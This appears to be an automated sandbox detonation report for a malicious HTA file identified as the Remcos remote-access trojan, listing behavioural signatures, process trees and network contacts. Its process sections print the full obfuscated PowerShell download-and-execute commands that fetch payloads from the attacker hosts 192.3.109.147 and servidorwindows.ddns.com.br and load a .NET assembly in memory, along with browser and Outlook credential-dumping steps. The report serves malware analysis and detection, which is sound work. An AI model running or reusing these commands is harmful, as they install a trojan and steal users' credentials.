Analysis Overview
SHA256
13cce0f3cd4d7c37976d04a6f7c8d656d1822ff8011617d130c2f2a121e4404f
Threat Level: Known bad
The file INETHTMLPAGE.hta was found to be: Known bad.
Malicious Activity Summary
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
NirSoft WebBrowserPassView
NirSoft MailPassView
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Evasion via Device Credential Deployment
Checks computer location settings
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 20:55
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 20:55
Reported
2024-08-06 20:57
Platform
win7-20240704-en
Max time kernel
16s
Max time network
22s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INETHTMLPAGE.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yxua9fxg.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA4B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBA4A.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㆛ ⺞ ⏬ ⦦ ⼀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MKNS/02/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
Network
| Country | Destination | Domain | Proto |
| US | 192.3.109.147:80 | 192.3.109.147 | tcp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\yxua9fxg.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\yxua9fxg.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\CSCBA4A.tmp
C:\Users\Admin\AppData\Local\Temp\RESBA4B.tmp
C:\Users\Admin\AppData\Local\Temp\yxua9fxg.dll
C:\Users\Admin\AppData\Local\Temp\yxua9fxg.pdb
C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 20:55
Reported
2024-08-06 20:57
Platform
win10v2004-20240802-en
Max time kernel
148s
Max time network
144s
Command Line
Signatures
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
NirSoft MailPassView
NirSoft WebBrowserPassView
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2720 set thread context of 1648 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1648 set thread context of 2160 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1648 set thread context of 4908 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1648 set thread context of 2448 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INETHTMLPAGE.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD254.tmp" "c:\Users\Admin\AppData\Local\Temp\1gtdujx5\CSC753D5C0F1284F02B1C3A2396961AB97.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㆛ ⺞ ⏬ ⦦ ⼀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MKNS/02/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zwogkiwmdapiaocrcpyqtwcwpd"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jqtzlbhnrihvduqvlakjwjwnqkkjc"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mszrmtshfqzaninzulflhorvzqbsvlzh"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 192.3.109.147:80 | 192.3.109.147 | tcp |
